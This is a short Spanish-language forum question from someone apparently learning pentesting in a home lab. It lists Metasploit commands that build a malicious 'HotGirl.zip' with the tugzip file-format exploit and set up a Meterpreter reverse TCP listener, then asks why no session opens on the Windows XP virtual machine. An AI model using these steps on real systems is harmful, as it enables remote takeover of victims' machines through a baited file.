Bueno, estoy aprendiendo a hacer pentest con Metasploit y estaba usando un exploit llamado "tugzip" que usa un protocolo rever_tcp, así que instalé Kali linux en mi computadora y usé una máquina virtual con Windows XP. Así que primero configuro el tugzip de esta manera:
use exploit/windows/fileformat/tugzip
set FILENAME HotGirl.zip
set LHOST 172.16.98.1(IP that i could ping from my VM that i assume it was mine)
set LPORT 443
exploit
Moví el archivo que creé a la sesión de la máquina virtual de Windows XP, y luego trato de iniciar una escucha y así lo hice:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 172.16.98.1
set LPORT 443
entonces aparentemente todo está bien porque me muestra esto:
[*] Exploit running as background job 3.
[*] Started reverse TCP handler on 172.16.98.1:443
Pero cuando abrí el archivo HotGirl.zip en mi máquina virtual Windows XP, no se abrirá una nueva sesión en Metasploit, no sé que no esté pasando nada.
p.s. Estoy usando VirtualBox